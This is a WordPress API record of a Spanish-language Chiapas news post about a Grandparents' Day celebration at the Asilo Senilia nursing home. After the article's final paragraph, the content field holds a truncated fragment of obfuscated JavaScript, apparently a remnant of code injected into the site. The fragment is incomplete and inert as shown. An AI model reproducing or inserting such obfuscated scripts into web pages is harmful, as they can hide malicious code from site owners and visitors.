{"id":17549,"date":"2024-08-29T03:09:54","date_gmt":"2024-08-29T03:09:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17549"},"modified":"2024-08-29T03:09:55","modified_gmt":"2024-08-29T03:09:55","slug":"celebran-dia-de-los-abuelos-en-asilo-senilia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17549","title":{"rendered":"Celebran D\u00eda de los Abuelos en Asilo Senilia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0021-1024x768.jpg\" alt=\"\" class=\"wp-image-17550\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0021-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0021-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0021-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0021.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>28 de agosto del 2024. San Crist\u00f3bal de Las Casas.- En un gesto de reconocimiento y afecto hacia los adultos mayores, la Coordinaci\u00f3n de Prevenci\u00f3n del Delito de esta ciudad, en colaboraci\u00f3n con la Casa de la Cultura &#8220;Nacaxtl\u00e1n&#8221; de Altamirano, organiz\u00f3 un emotivo festejo en conmemoraci\u00f3n del D\u00eda de los Abuelos. El evento se llev\u00f3 a cabo en las instalaciones del Asilo Senilia, conocido por ser un centro de asistencia de vida para personas de la tercera edad.<\/p>\n\n\n\n<p>La celebraci\u00f3n estuvo marcada por la alegr\u00eda y el calor humano, con m\u00fasica de guitarra y marimba que ambient\u00f3 la convivencia entre el personal de la Coordinaci\u00f3n, voluntarios y los abuelitos residentes del asilo. Durante el evento, se reconoci\u00f3 a los adultos mayores por su invaluable contribuci\u00f3n a la familia y a la sociedad, destacando su papel fundamental en la construcci\u00f3n de valores.<\/p>\n\n\n\n<p>Gloribeth Dom\u00ednguez Gonz\u00e1lez, coordinadora de Prevenci\u00f3n del Delito Municipal, agradeci\u00f3 a las autoridades del asilo por las facilidades brindadas para la realizaci\u00f3n de la actividad. En su discurso, subray\u00f3 la importancia de fortalecer el cuidado de los abuelos, quienes, debido a enfermedades degenerativas, deterioro f\u00edsico y fragilidad, pueden requerir ayuda a largo plazo, preferiblemente en el entorno familiar.<\/p>\n\n\n\n<p>Dom\u00ednguez Gonz\u00e1lez enfatiz\u00f3 que el rol de la familia es crucial en el cuidado de los adultos mayores, no solo en lo f\u00edsico, que implica m\u00faltiples tareas y responsabilidades, sino tambi\u00e9n en lo emocional y afectivo. &#8220;Es fundamental que nuestros abuelitos disfruten en plenitud esta etapa de sus vidas&#8221;, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Adem\u00e1s, la Coordinadora destac\u00f3 el papel vital de los abuelos en la vida de sus nietos, describi\u00e9ndolos como gu\u00edas, consejeros y amigos incondicionales. Por ello, inst\u00f3 a la comunidad a hacer sentir a los abuelos felices y valorados en todo momento.<\/p>\n\n\n\n<p>Finalmente, la funcionaria hizo un llamado a la ciudadan\u00eda de San Crist\u00f3bal de Las Casas para que se comprometa a brindar una atenci\u00f3n de calidad a los adultos mayores, asegurando que cada miembro de la familia asuma la responsabilidad de ofrecerles una vida digna y libre de cualquier tipo de violencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 28 de agosto del 2024. San Crist\u00f3bal de Las Casas.- En un gesto de reconocimiento y afecto hacia los adultos mayores, la Coordinaci\u00f3n de Prevenci\u00f3n del Delito de esta ciudad, en colaboraci\u00f3n con la Casa de la Cultura &#8220;Nacaxtl\u00e1n&#8221; de Altamirano, organiz\u00f3 un emotivo festejo en conmemoraci\u00f3n del D\u00eda de los Abuelos. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17550,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17549","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17549","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17549"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17549\/revisions"}],"predecessor-version":[{"id":17551,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17549\/revisions\/17551"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17550"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17549"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17549"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17549"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}